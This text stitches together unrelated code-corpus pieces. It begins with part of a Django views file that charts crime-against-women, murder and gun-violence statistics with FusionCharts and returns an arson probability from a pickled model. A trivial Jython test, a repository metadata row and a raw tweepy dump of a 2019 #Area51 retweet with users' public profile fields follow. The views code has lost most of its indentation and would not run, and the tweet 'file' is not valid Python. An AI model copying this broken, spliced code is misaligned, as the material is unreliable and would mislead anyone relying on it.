arrDara['value'] = key.Victims_Total
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'murder/murdpie.html', {'output': column2D.render(), 'var1':var1})
def murd2010(request):
dataSource = {}
var1 = 2010
dataSource['chart'] = {
"caption": "Click on each State for a gender Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
    # Iterate over the `murder` rows for this year and insert them into the `dataSource['data']` list.
for key in murder.objects.all().filter(Year = 2010):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Victims_Total
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
        # Initialise the linkData entry for this state's drilldown chart
        linkData = {}
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the Muders with respect to gender in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in murder.objects.all().filter(Year = 2010, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Group_Name
arrDara['value'] = key.Victims_Total
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'murder/murdpie.html', {'output': column2D.render(), 'var1':var1})
def murd2001(request):
dataSource = {}
var1 = 2001
dataSource['chart'] = {
"caption": "Click on each State for a gender Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
    # Iterate over the `murder` rows for this year and insert them into the `dataSource['data']` list.
for key in murder.objects.all().filter(Year = 2001):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Victims_Total
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
        # Initialise the linkData entry for this state's drilldown chart
        linkData = {}
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the Muders with respect to gender in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in murder.objects.all().filter(Year = 2001, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Group_Name
arrDara['value'] = key.Victims_Total
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'murder/murdpie.html', {'output': column2D.render(), 'var1':var1})
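# --- Hedged refactor sketch (not part of the original app) -----------------
# As with the chart_year sketch above, one parameterized view (hypothetical
# name `murd_year`) could replace the ten murdYYYY views, assuming the same
# `murder` model and the shared 'murder/murdpie.html' template.
def murd_year(request, year):
    dataSource = {'chart': {"caption": "Click on each State for a gender Analysis",
                            "theme": "ocean"},
                  'data': [], 'linkeddata': []}
    for state in murder.objects.filter(Year=year):
        dataSource['data'].append({'label': state.Area_Name,
                                   'value': state.Victims_Total,
                                   'link': 'newchart-json-' + state.Area_Name})
        rows = murder.objects.filter(Year=year, Area_Name=state.Area_Name)
        dataSource['linkeddata'].append({
            'id': state.Area_Name,
            'linkedchart': {
                'chart': {'caption': "Analysis of the murders with respect to gender in - " + state.Area_Name,
                          'showValues': "0", 'theme': "zune"},
                'data': [{'label': r.Group_Name, 'value': r.Victims_Total} for r in rows],
            },
        })
    column2D = FusionCharts("column2D", "ex1", "1200", "600", "chart-1", "json", dataSource)
    return render(request, 'murder/murdpie.html', {'output': column2D.render(), 'var1': year})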
def shooting(request):
template = loader.get_template('shoot_killed.html')
return HttpResponse(template.render())
def shot_kil(request):
module_dir = os.path.dirname(__file__)
file_path = os.path.join(module_dir, 'gun-violence-data_01-2013_03-2018.tar.gz')
d = pd.read_csv(file_path)
states = list(d['state'].unique())
killed=[]
for i in states:
s = d[(d['state']== i)]
k = sum(s['n_killed'])
killed.append(k)
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of Number of deaths in school shooting",
"subCaption": "Click on the states for city/county wise analysis",
"theme": "ocean"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
for key in range(0,len(states)):
data = {}
data['label'] = states[key]
data['value'] = float(killed[key])
dataSource['data'].append(data)
pie3d = FusionCharts("column2D", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'shoot/kild.html', {'output' : pie3d.render()})
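# --- Hedged sketch (not part of the original view) --------------------------
# Assumption: pandas' read_csv decompresses plain gzip but not tar archives,
# so a '.tar.gz' file generally needs to be opened with tarfile first; the
# single-member assumption below is hypothetical. groupby also replaces the
# manual per-state summing loop in shot_kil above.
import tarfile

def killed_per_state(file_path):
    with tarfile.open(file_path, 'r:gz') as tar:
        member = tar.getmembers()[0]  # assume the archive holds one CSV
        with tar.extractfile(member) as f:
            d = pd.read_csv(f)
    # Series of total people killed per state, indexed by state name.
    return d.groupby('state')['n_killed'].sum()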
def injkill(request):
template = loader.get_template('injvkill.html')
return HttpResponse(template.render())
def shot_inj(request):
template = loader.get_template('shot_inj.html')
return HttpResponse(template.render())
def fatal(request):
template = loader.get_template('fatal.html')
return HttpResponse(template.render())
def death(request):
template = loader.get_template('death.html')
return HttpResponse(template.render())
def inj(request):
template = loader.get_template('inj.html')
return HttpResponse(template.render())
def diainj(request):
template = loader.get_template('deainj.html')
return HttpResponse(template.render())
def deaandinj(request):
template = loader.get_template('deaandinj.html')
return HttpResponse(template.render())
def sanfrancisco(request):
filename = 'prediction.sav'
module_dir = os.path.dirname(__file__)
file_path = os.path.join(module_dir, filename)
model = pickle.load(open(file_path, 'rb'))
p = [0] * 17
day = 'Sunday'
place = 'BAYVIEW'
if day == 'Friday':
p[0]= 1
if day == 'Monday':
p[1]= 1
if day == 'Saturday':
p[2]= 1
if day == 'Sunday':
p[3]= 1
if day == 'Thursday':
p[4]= 1
if day == 'Tuesday':
p[5]= 1
if day == 'Wednesday':
p[6]= 1
if place == 'BAYVIEW':
p[7] = 1
if place == 'CENTRAL':
p[8] = 1
if place == 'INGLESIDE':
p[9] = 1
if place == 'MISSION':
p[10] = 1
if place == 'NORTHERN':
p[11] = 1
if place == 'PARK':
p[12] = 1
if place == 'RICHMOND':
p[13] = 1
if place == 'SOUTHERN':
p[14] = 1
if place == 'TARAVAL':
p[15] = 1
if place == 'TENDERLOIN':
p[16] = 1
    # scikit-learn estimators expect a 2D array of samples, so wrap the
    # single feature vector in a list before predicting.
    array = model.predict_proba([p])
    print("Probability of Arson: ", array[0][0] * 100, "%")
    return HttpResponse(array[0][0] * 100)
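# --- Hedged sketch (not part of the original view) --------------------------
# A table-driven one-hot encoding can replace the 17-branch if chain above,
# assuming the model was trained with the same feature order (the seven days
# first, then the ten districts). `DAYS`, `PLACES`, and `encode_features` are
# hypothetical names.
DAYS = ['Friday', 'Monday', 'Saturday', 'Sunday', 'Thursday', 'Tuesday', 'Wednesday']
PLACES = ['BAYVIEW', 'CENTRAL', 'INGLESIDE', 'MISSION', 'NORTHERN',
          'PARK', 'RICHMOND', 'SOUTHERN', 'TARAVAL', 'TENDERLOIN']

def encode_features(day, place):
    # Set exactly one day flag and one district flag.
    p = [0] * (len(DAYS) + len(PLACES))
    p[DAYS.index(day)] = 1
    p[len(DAYS) + PLACES.index(place)] = 1
    return p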
# --- bugtests/test080m.py (doom38/jython_v2.2.1) ---
def Spam(): return 'bar'
99119a4f74fc47d1066504cbc1ca439b3c605f73 | 51,752 | py | Python | 3 tweets de resultado de busquedas trends globales.py | JacoGuerra/TwitterBot | 09a9ef1817d04acc5bbace23a4b2ba5d31813dec | [
"MIT"
] | null | null | null | 3 tweets de resultado de busquedas trends globales.py | JacoGuerra/TwitterBot | 09a9ef1817d04acc5bbace23a4b2ba5d31813dec | [
"MIT"
] | null | null | null | 3 tweets de resultado de busquedas trends globales.py | JacoGuerra/TwitterBot | 09a9ef1817d04acc5bbace23a4b2ba5d31813dec | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sat Jul 13 01:52:29 2019
@author: Inki
"""
Status(_api = < tweepy.api.API object at 0x000001CE1B31E198 > , _json = {
'created_at': 'Fri Jul 12 22:13:55 +0000 2019',
'id': 1149804105717731330,
'id_str': '1149804105717731330',
'text': 'RT @Iesbianbecca: my alien after i rescue him from #Area51 https://t.co/2cpjcCexgg',
'truncated': False,
'entities': {
'hashtags': [{
'text': 'Area51',
'indices': [51, 58]
}],
'symbols': [],
'user_mentions': [{
'screen_name': 'Iesbianbecca',
'name': 'yung gravy’s pr manager',
'id': 1148054049884921856,
'id_str': '1148054049884921856',
'indices': [3, 16]
}],
'urls': [],
'media': [{
'id': 1149725663957573632,
'id_str': '1149725663957573632',
'indices': [59, 82],
'media_url': 'http://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'media_url_https': 'https://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'url': 'https://t.co/2cpjcCexgg',
'display_url': 'pic.twitter.com/2cpjcCexgg',
'expanded_url': 'https://twitter.com/Iesbianbecca/status/1149725895483154432/video/1',
'type': 'photo',
'sizes': {
'thumb': {
'w': 150,
'h': 150,
'resize': 'crop'
},
'small': {
'w': 680,
'h': 680,
'resize': 'fit'
},
'medium': {
'w': 720,
'h': 720,
'resize': 'fit'
},
'large': {
'w': 720,
'h': 720,
'resize': 'fit'
}
},
'source_status_id': 1149725895483154432,
'source_status_id_str': '1149725895483154432',
'source_user_id': 1148054049884921856,
'source_user_id_str': '1148054049884921856'
}]
},
'extended_entities': {
'media': [{
'id': 1149725663957573632,
'id_str': '1149725663957573632',
'indices': [59, 82],
'media_url': 'http://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'media_url_https': 'https://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'url': 'https://t.co/2cpjcCexgg',
'display_url': 'pic.twitter.com/2cpjcCexgg',
'expanded_url': 'https://twitter.com/Iesbianbecca/status/1149725895483154432/video/1',
'type': 'video',
'sizes': {
'thumb': {
'w': 150,
'h': 150,
'resize': 'crop'
},
'small': {
'w': 680,
'h': 680,
'resize': 'fit'
},
'medium': {
'w': 720,
'h': 720,
'resize': 'fit'
},
'large': {
'w': 720,
'h': 720,
'resize': 'fit'
}
},
'source_status_id': 1149725895483154432,
'source_status_id_str': '1149725895483154432',
'source_user_id': 1148054049884921856,
'source_user_id_str': '1148054049884921856',
'video_info': {
'aspect_ratio': [1, 1],
'duration_millis': 13000,
'variants': [{
'bitrate': 832000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/480x480/iB0faFJ4tTnMTK3p.mp4?tag=10'
}, {
'bitrate': 432000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/320x320/tIFHIqkUkl43zzRQ.mp4?tag=10'
}, {
'content_type': 'application/x-mpegURL',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/pl/7f3FKQFqvkCIyBK-.m3u8?tag=10'
}, {
'bitrate': 1280000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/720x720/yb_4FZmN-oJkFrDA.mp4?tag=10'
}]
},
'additional_media_info': {
'monetizable': False,
'source_user': {
'id': 1148054049884921856,
'id_str': '1148054049884921856',
'name': 'yung gravy’s pr manager',
'screen_name': 'Iesbianbecca',
'location': 'she/her',
'description': 'becca + kelly',
'url': None,
'entities': {
'description': {
'urls': []
}
},
'protected': False,
'followers_count': 48,
'friends_count': 52,
'listed_count': 0,
'created_at': 'Mon Jul 08 02:19:50 +0000 2019',
'favourites_count': 176,
'utc_offset': None,
'time_zone': None,
'geo_enabled': False,
'verified': False,
'statuses_count': 185,
'lang': None,
'contributors_enabled': False,
'is_translator': False,
'is_translation_enabled': False,
'profile_background_color': 'F5F8FA',
'profile_background_image_url': None,
'profile_background_image_url_https': None,
'profile_background_tile': False,
'profile_image_url': 'http://pbs.twimg.com/profile_images/1149741577583153152/nlrqvE20_normal.jpg',
'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1149741577583153152/nlrqvE20_normal.jpg',
'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1148054049884921856/1562951862',
'profile_link_color': '1DA1F2',
'profile_sidebar_border_color': 'C0DEED',
'profile_sidebar_fill_color': 'DDEEF6',
'profile_text_color': '333333',
'profile_use_background_image': True,
'has_extended_profile': True,
'default_profile': True,
'default_profile_image': False,
'following': False,
'follow_request_sent': False,
'notifications': False,
'translator_type': 'none'
}
}
}]
},
'metadata': {
'iso_language_code': 'en',
'result_type': 'recent'
},
'source': '<a href="http://twitter.com/download/iphone" rel="nofollow">Twitter for iPhone</a>',
'in_reply_to_status_id': None,
'in_reply_to_status_id_str': None,
'in_reply_to_user_id': None,
'in_reply_to_user_id_str': None,
'in_reply_to_screen_name': None,
'user': {
'id': 811843219315113984,
'id_str': '811843219315113984',
'name': 'sebastian ponce',
'screen_name': 'sebsss7',
'location': 'McAllen, TX',
'description': '',
'url': None,
'entities': {
'description': {
'urls': []
}
},
'protected': False,
'followers_count': 57,
'friends_count': 222,
'listed_count': 0,
'created_at': 'Thu Dec 22 07:58:01 +0000 2016',
'favourites_count': 1597,
'utc_offset': None,
'time_zone': None,
'geo_enabled': False,
'verified': False,
'statuses_count': 1017,
'lang': None,
'contributors_enabled': False,
'is_translator': False,
'is_translation_enabled': False,
'profile_background_color': 'F5F8FA',
'profile_background_image_url': None,
'profile_background_image_url_https': None,
'profile_background_tile': False,
'profile_image_url': 'http://pbs.twimg.com/profile_images/1148388633872875520/ySSTkr4Q_normal.jpg',
'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1148388633872875520/ySSTkr4Q_normal.jpg',
'profile_banner_url': 'https://pbs.twimg.com/profile_banners/811843219315113984/1562632232',
'profile_link_color': '1DA1F2',
'profile_sidebar_border_color': 'C0DEED',
'profile_sidebar_fill_color': 'DDEEF6',
'profile_text_color': '333333',
'profile_use_background_image': True,
'has_extended_profile': True,
'default_profile': True,
'default_profile_image': False,
'following': False,
'follow_request_sent': False,
'notifications': False,
'translator_type': 'none'
},
'geo': None,
'coordinates': None,
'place': None,
'contributors': None,
'retweeted_status': {
'created_at': 'Fri Jul 12 17:03:09 +0000 2019',
'id': 1149725895483154432,
'id_str': '1149725895483154432',
'text': 'my alien after i rescue him from #Area51 https://t.co/2cpjcCexgg',
'truncated': False,
'entities': {
'hashtags': [{
'text': 'Area51',
'indices': [33, 40]
}],
'symbols': [],
'user_mentions': [],
'urls': [],
'media': [{
'id': 1149725663957573632,
'id_str': '1149725663957573632',
'indices': [41, 64],
'media_url': 'http://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'media_url_https': 'https://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'url': 'https://t.co/2cpjcCexgg',
'display_url': 'pic.twitter.com/2cpjcCexgg',
'expanded_url': 'https://twitter.com/Iesbianbecca/status/1149725895483154432/video/1',
'type': 'photo',
'sizes': {
'thumb': {
'w': 150,
'h': 150,
'resize': 'crop'
},
'small': {
'w': 680,
'h': 680,
'resize': 'fit'
},
'medium': {
'w': 720,
'h': 720,
'resize': 'fit'
},
'large': {
'w': 720,
'h': 720,
'resize': 'fit'
}
}
}]
},
'extended_entities': {
'media': [{
'id': 1149725663957573632,
'id_str': '1149725663957573632',
'indices': [41, 64],
'media_url': 'http://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'media_url_https': 'https://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'url': 'https://t.co/2cpjcCexgg',
'display_url': 'pic.twitter.com/2cpjcCexgg',
'expanded_url': 'https://twitter.com/Iesbianbecca/status/1149725895483154432/video/1',
'type': 'video',
'sizes': {
'thumb': {
'w': 150,
'h': 150,
'resize': 'crop'
},
'small': {
'w': 680,
'h': 680,
'resize': 'fit'
},
'medium': {
'w': 720,
'h': 720,
'resize': 'fit'
},
'large': {
'w': 720,
'h': 720,
'resize': 'fit'
}
},
'video_info': {
'aspect_ratio': [1, 1],
'duration_millis': 13000,
'variants': [{
'bitrate': 832000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/480x480/iB0faFJ4tTnMTK3p.mp4?tag=10'
}, {
'bitrate': 432000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/320x320/tIFHIqkUkl43zzRQ.mp4?tag=10'
}, {
'content_type': 'application/x-mpegURL',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/pl/7f3FKQFqvkCIyBK-.m3u8?tag=10'
}, {
'bitrate': 1280000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/720x720/yb_4FZmN-oJkFrDA.mp4?tag=10'
}]
},
'additional_media_info': {
'monetizable': False
}
}]
},
'metadata': {
'iso_language_code': 'en',
'result_type': 'recent'
},
'source': '<a href="http://twitter.com/download/iphone" rel="nofollow">Twitter for iPhone</a>',
'in_reply_to_status_id': None,
'in_reply_to_status_id_str': None,
'in_reply_to_user_id': None,
'in_reply_to_user_id_str': None,
'in_reply_to_screen_name': None,
'user': {
'id': 1148054049884921856,
'id_str': '1148054049884921856',
'name': 'yung gravy’s pr manager',
'screen_name': 'Iesbianbecca',
'location': 'she/her',
'description': 'becca + kelly',
'url': None,
'entities': {
'description': {
'urls': []
}
},
'protected': False,
'followers_count': 48,
'friends_count': 52,
'listed_count': 0,
'created_at': 'Mon Jul 08 02:19:50 +0000 2019',
'favourites_count': 176,
'utc_offset': None,
'time_zone': None,
'geo_enabled': False,
'verified': False,
'statuses_count': 185,
'lang': None,
'contributors_enabled': False,
'is_translator': False,
'is_translation_enabled': False,
'profile_background_color': 'F5F8FA',
'profile_background_image_url': None,
'profile_background_image_url_https': None,
'profile_background_tile': False,
'profile_image_url': 'http://pbs.twimg.com/profile_images/1149741577583153152/nlrqvE20_normal.jpg',
'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1149741577583153152/nlrqvE20_normal.jpg',
'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1148054049884921856/1562951862',
'profile_link_color': '1DA1F2',
'profile_sidebar_border_color': 'C0DEED',
'profile_sidebar_fill_color': 'DDEEF6',
'profile_text_color': '333333',
'profile_use_background_image': True,
'has_extended_profile': True,
'default_profile': True,
'default_profile_image': False,
'following': False,
'follow_request_sent': False,
'notifications': False,
'translator_type': 'none'
},
'geo': None,
'coordinates': None,
'place': None,
'contributors': None,
'is_quote_status': False,
'retweet_count': 8853,
'favorite_count': 22422,
'favorited': False,
'retweeted': False,
'possibly_sensitive': False,
'lang': 'en'
},
'is_quote_status': False,
'retweet_count': 8853,
'favorite_count': 0,
'favorited': False,
'retweeted': False,
'possibly_sensitive': False,
'lang': 'en'
}, created_at = datetime.datetime(2019, 7, 12, 22, 13, 55), id = 1149804105717731330, id_str = '1149804105717731330', text = 'RT @Iesbianbecca: my alien after i rescue him from #Area51 https://t.co/2cpjcCexgg', truncated = False, entities = {
'hashtags': [{
'text': 'Area51',
'indices': [51, 58]
}],
'symbols': [],
'user_mentions': [{
'screen_name': 'Iesbianbecca',
'name': 'yung gravy’s pr manager',
'id': 1148054049884921856,
'id_str': '1148054049884921856',
'indices': [3, 16]
}],
'urls': [],
'media': [{
'id': 1149725663957573632,
'id_str': '1149725663957573632',
'indices': [59, 82],
'media_url': 'http://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'media_url_https': 'https://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'url': 'https://t.co/2cpjcCexgg',
'display_url': 'pic.twitter.com/2cpjcCexgg',
'expanded_url': 'https://twitter.com/Iesbianbecca/status/1149725895483154432/video/1',
'type': 'photo',
'sizes': {
'thumb': {
'w': 150,
'h': 150,
'resize': 'crop'
},
'small': {
'w': 680,
'h': 680,
'resize': 'fit'
},
'medium': {
'w': 720,
'h': 720,
'resize': 'fit'
},
'large': {
'w': 720,
'h': 720,
'resize': 'fit'
}
},
'source_status_id': 1149725895483154432,
'source_status_id_str': '1149725895483154432',
'source_user_id': 1148054049884921856,
'source_user_id_str': '1148054049884921856'
}]
}, extended_entities = {
'media': [{
'id': 1149725663957573632,
'id_str': '1149725663957573632',
'indices': [59, 82],
'media_url': 'http://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'media_url_https': 'https://pbs.twimg.com/ext_tw_video_thumb/1149725663957573632/pu/img/H5tZVN-NafGEIuja.jpg',
'url': 'https://t.co/2cpjcCexgg',
'display_url': 'pic.twitter.com/2cpjcCexgg',
'expanded_url': 'https://twitter.com/Iesbianbecca/status/1149725895483154432/video/1',
'type': 'video',
'sizes': {
'thumb': {
'w': 150,
'h': 150,
'resize': 'crop'
},
'small': {
'w': 680,
'h': 680,
'resize': 'fit'
},
'medium': {
'w': 720,
'h': 720,
'resize': 'fit'
},
'large': {
'w': 720,
'h': 720,
'resize': 'fit'
}
},
'source_status_id': 1149725895483154432,
'source_status_id_str': '1149725895483154432',
'source_user_id': 1148054049884921856,
'source_user_id_str': '1148054049884921856',
'video_info': {
'aspect_ratio': [1, 1],
'duration_millis': 13000,
'variants': [{
'bitrate': 832000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/480x480/iB0faFJ4tTnMTK3p.mp4?tag=10'
}, {
'bitrate': 432000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/320x320/tIFHIqkUkl43zzRQ.mp4?tag=10'
}, {
'content_type': 'application/x-mpegURL',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/pl/7f3FKQFqvkCIyBK-.m3u8?tag=10'
}, {
'bitrate': 1280000,
'content_type': 'video/mp4',
'url': 'https://video.twimg.com/ext_tw_video/1149725663957573632/pu/vid/720x720/yb_4FZmN-oJkFrDA.mp4?tag=10'
}]
},
'additional_media_info': {
'monetizable': False,
'source_user': {
'id': 1148054049884921856,
'id_str': '1148054049884921856',
'name': 'yung gravy’s pr manager',
'screen_name': 'Iesbianbecca',
'location': 'she/her',
'description': 'becca + kelly',
'url': None,
'entities': {
'description': {
'urls': []
}
},
'protected': False,
'followers_count': 48,
'friends_count': 52,
'listed_count': 0,
'created_at': 'Mon Jul 08 02:19:50 +0000 2019',
'favourites_count': 176,
'utc_offset': None,
'time_zone': None,
'geo_enabled': False,
'verified': False,
'statuses_count': 185,
'lang': None,
'contributors_enabled': False,
'is_translator': False,
'is_translation_enabled': False,
'profile_background_color': 'F5F8FA',
'profile_background_image_url': None,
'profile_background_image_url_https': None,
'profile_background_tile': False,
'profile_image_url': 'http://pbs.twimg.com/profile_images/1149741577583153152/nlrqvE20_normal.jpg',
'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1149741577583153152/nlrqvE20_normal.jpg',
'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1148054049884921856/1562951862',
'profile_link_color': '1DA1F2',
'profile_sidebar_border_color': 'C0DEED',
'profile_sidebar_fill_color': 'DDEEF6',
'profile_text_color': '333333',
'profile_use_background_image': True,
'has_extended_profile': True,
'default_profile': True,
'default_profile_image': False,
'following': False,
'follow_request_sent': False,
'notifications': False,
'translator_type': 'none'
}
}
}]
}, metadata = {
'iso_language_code': 'en',
'result_type': 'recent'
}, source = 'Twitter for iPhone', source_url = 'http://twitter.com/download/iphone', in_reply_to_status_id = None, in_reply_to_status_id_str = None, in_reply_to_user_id = None, in_reply_to_user_id_str = None, in_reply_to_screen_name = None, author = User(_api = < tweepy.api.API object at 0x000001CE1B31E198 > , _json = {
'id': 811843219315113984,
'id_str': '811843219315113984',
'name': 'sebastian ponce',
'screen_name': 'sebsss7',
'location': 'McAllen, TX',
'description': '',
'url': None,
'entities': {
'description': {
'urls': []
}
},
'protected': False,
'followers_count': 57,
'friends_count': 222,
'listed_count': 0,
'created_at': 'Thu Dec 22 07:58:01 +0000 2016',
'favourites_count': 1597,
'utc_offset': None,
'time_zone': None,
'geo_enabled': False,
'verified': False,
'statuses_count': 1017,
'lang': None,
'contributors_enabled': False,
'is_translator': False,
'is_translation_enabled': False,
'profile_background_color': 'F5F8FA',
'profile_background_image_url': None,
'profile_background_image_url_https': None,
'profile_background_tile': False,
'profile_image_url': 'http://pbs.twimg.com/profile_images/1148388633872875520/ySSTkr4Q_normal.jpg',
'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1148388633872875520/ySSTkr4Q_normal.jpg',
'profile_banner_url': 'https://pbs.twimg.com/profile_banners/811843219315113984/1562632232',
'profile_link_color': '1DA1F2',
'profile_sidebar_border_color': 'C0DEED',
'profile_sidebar_fill_color': 'DDEEF6',
'profile_text_color': '333333',
'profile_use_background_image': True,
'has_extended_profile': True,
'default_profile': True,
'default_profile_image': False,
'following': False,
'follow_request_sent': False,
'notifications': False,
'translator_type': 'none'
}, id = 811843219315113984, id_str = '811843219315113984', name = 'sebastian ponce', screen_name = 'sebsss7', location = 'McAllen, TX', description = '', url = None, entities = {
'description': {
'urls': []
}
}, protected = False, followers_count = 57, friends_count = 222, listed_count = 0, created_at = datetime.datetime(2016, 12, 22, 7, 58, 1), favourites_count = 1597, utc_offset = None, time_zone = None, geo_enabled = False, verified = False, statuses_count = 1017, lang = None, contributors_enabled = False, is_translator = False, is_translation_enabled = False, profile_background_color = 'F5F8FA', profile_background_image_url = None, profile_background_image_url_https = None, profile_background_tile = False, profile_image_url = 'http://pbs.twimg.com/profile_images/1148388633872875520/ySSTkr4Q_normal.jpg', profile_image_url_https = 'https://pbs.twimg.com/profile_images/1148388633872875520/ySSTkr4Q_normal.jpg', profile_banner_url = 'https://pbs.twimg.com/profile_banners/811843219315113984/1562632232', profile_link_color = '1DA1F2', profile_sidebar_border_color = 'C0DEED', profile_sidebar_fill_color = 'DDEEF6', profile_text_color = '333333', profile_use_background_image = True, has_extended_profile = True, default_profile = True, default_profile_image = False, following = False, follow_request_sent = False, notifications = False, translator_type = 'none'), user = User(_api = < tweepy.api.API object at 0x000001CE1B31E198 > , _json = {
'id': 811843219315113984,
'id_str': '811843219315113984',
'name': 'sebastian ponce',
'screen_name': 'sebsss7',
'location': 'McAllen, TX',
'description': '',
'url': None,
'entities': {
'description': {
'urls': []
}
},
'protected': False,
'followers_count': 57,
'friends_count': 222,
'listed_count': 0,
'created_at': 'Thu Dec 22 07:58:01 +0000 2016',
'favourites_count': 1597,
'utc_offset': None,
'time_zone': None,
'geo_enabled': False,
'verified': False,
'statuses_count': 1017,
'lang': None,
'contributors_enabled': False,
'is_translator': False,
'is_translation_enabled': False,
'profile_background_color': 'F5F8FA',
'profile_background_image_url': None,
'profile_background_image_url_https': None,
'profile_background_tile': False,
'profile_image_url': 'http://pbs.twimg.com/profile_images/1148388633872875520/ySSTkr4Q_normal.jpg',
'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1148388633872875520/ySSTkr4Q_normal.jpg',
'profile_banner_url': 'https://pbs.twimg.com/profile_banners/811843219315113984/1562632232',
'profile_link_color': '1DA1F2',
'profile_sidebar_border_color': 'C0DEED',
'profile_sidebar_fill_color': 'DDEEF6',
'profile_text_color': '333333',
'profile_use_background_image': True,
'has_extended_profile': True,
'default_profile': True,
'default_profile_image': False,
'following': False,
'follow_request_sent': False,
'notifications': False,
'translator_type': 'none'
}, id = 811843219315113984, id_str = '811843219315113984', name = 'sebastian ponce', screen_name = 'sebsss7', location = 'McAllen, TX', description = '', url = None, entities = {
'description': {
'urls': []
}
